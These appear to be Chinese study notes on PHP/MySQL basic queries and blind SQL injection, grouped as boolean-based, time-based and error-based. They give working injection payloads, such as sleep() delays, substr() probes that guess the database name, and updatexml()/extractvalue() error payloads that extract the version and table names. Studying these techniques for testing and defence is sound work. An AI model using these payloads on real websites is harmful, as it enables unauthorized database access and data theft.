#PHP-MYSQL-SQL 操作 - 增刪改查
1 、功能:數據查詢(對數據感興趣)
查詢: SELECT * FROM news where id=$id
2 、功能:新增用戶,添加新聞等(對操作的結果感興趣)
增加: INSERT INTO news ( 字段名 ) VALUES ( 數據 )
3 、功能:刪除用戶,刪除新聞等
刪除: DELETE FROM news WHERE id=$id
4 、功能:修改用戶,修改文章等
修改: UPDATE news SET id=$id
#PHP-MYSQL- 注入函數 - 布爾 & 報錯 & 延遲
盲注就是在注入過程中,獲取的數據不能回顯至前端頁面。
我們需要利用一些方法進行判斷或者嘗試,這個過程稱之為盲注。
解決:常規的聯合查詢注入不行的情況
我們可以知道盲注分為以下三類:
1 、基于布爾的 SQL 盲注 - 邏輯判斷
regexp,like,ascii,left,ord,mid
2 、基于時間的 SQL 盲注 - 延時判斷
if,sleep
3 、基于報錯的 SQL 盲注 - 報錯回顯
floor , updatexml , extractvalue
延遲:(不需要有回顯和報錯)
and sleep(1);
and if(1>2,sleep(1),0);
and if(1<2,sleep(1),0);
布爾:(需要有回顯 不需要報錯)
and length(database())=7;
and left(database(),1)='p';
and left(database(),2)='pi';
and substr(database(),1,1)='p';
and substr(database(),2,1)='i';
and ord(left(database(),1))=112;
報錯:(需要有報錯 不需要有回顯)
and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)
and extractvalue(1, concat(0x5c, (select table_name from
information_schema.tables limit 1)));
更多: https://www.jianshu.com/p/bc35f8dd4f7c
 的基本使用資料)
)
)
